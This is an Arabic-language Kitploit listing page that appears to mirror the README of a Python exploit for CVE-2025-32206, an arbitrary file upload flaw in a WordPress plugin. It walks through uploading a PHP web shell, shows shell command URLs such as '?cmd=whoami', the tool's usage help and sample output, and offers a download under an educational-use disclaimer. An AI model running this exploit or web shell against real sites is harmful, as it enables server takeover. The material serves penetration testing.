Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-32206 — إضافة Processing Projects لووردبريس <= 1.0.2 معرضة لثغرة رفع الملفات التعسفي | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-32206
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالشيل كوداستغلال تطبيقات الويباختبار الاختراق
GitHubnxploited/cve-2025-32206

CVE-2025-32206

إضافة Processing Projects لووردبريس <= 1.0.2 معرضة لثغرة رفع الملفات التعسفي

عرض المستودع
21منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-32206 - استغلال ثغرة رفع الملفات غير المقيد في WordPress Processing Projects <= 1.0.2

CVE-2025-32206 Banner


🔍 معلومات CVE

  • معرف CVE: CVE-2025-32206
  • نوع الثغرة: رفع ملفات غير مقيد (Web Shell Upload)
  • الإضافة المتأثرة: إضافة Processing Projects لووردبريس
  • النسخ المتأثرة: من غير معروف (غير متاح) حتى 1.0.2
  • درجة CVSS: 9.1 (حرجة)
  • المتجه: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

"ثغرة رفع ملفات غير مقيد من نوع خطير في إضافة LABCAT Processing Projects تتيح للمهاجمين رفع Web Shell إلى خادم الويب، مما قد يؤدي إلى اختراق كامل للنظام."


🧑‍💻 وصف الاستغلال

يستهدف هذا السكربت الاستغلالي المكتوب بلغة Python مواقع ووردبريس التي تستخدم إضافة Processing Projects المعرضة للثغرة (الإصدار <= 1.0.2). تتعامل الإضافة بشكل غير سليم مع رفع الملفات من المستخدمين الموثقين، مما يسمح لهم برفع ملفات ZIP عشوائية تتضمن أكواد PHP قابلة للتنفيذ (Web Shell).

يقوم السكربت الاستغلالي بما يلي:

  1. يُصادق على موقع ووردبريس الهدف بصلاحيات مسؤول.
  2. ينتقل إلى نقطة النهاية (Endpoint) المعرضة للثغرة ويستخرج حقول nonce تلقائيًا.
  3. ينشئ ملف ZIP (Nxploited.zip) يحتوي على شل PHP خبيث (Nxploit.php).
  4. يرفع الملف عبر طلب POST يحاكي سلوك مشرف ووردبريس.
  5. يتحقق من إمكانية الوصول إلى الشل على:
    • http://target.com/wp-content/uploads/processing-projects/Nxploit.php

🐚 استخدام الشل

بمجرد رفع الشل بنجاح، يمكن استخدامه لتنفيذ أوامر النظام عبر معامل cmd. أمثلة:

root@kitploit:~
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls

ينفذ هذا الشل أوامر نظام تشغيل عشوائية ويعيد مخرجاتها مباشرة في الاستجابة.


🚀 الاستخدام

root@kitploit:~
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g. http://target.com/wordpress)
  -un, --username USERNAME     WordPress admin username
  -p, --password PASSWORD      WordPress admin password

📄 مخرجات نموذجية

root@kitploit:~

[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi

[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php

⚠️ إخلاء المسؤولية

هذا السكربت مقدم لأغراض تعليمية فقط. الاستخدام غير المصرح به لهذا الاستغلال على أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.

التزم دائمًا بممارسات الإفصاح المسؤول واستخدم هذه الأداة فقط في بيئات خاضعة للتحكم أو بتفويض صريح.


بواسطة: Nxploited | Khaled Alenazi

تنزيل الأداة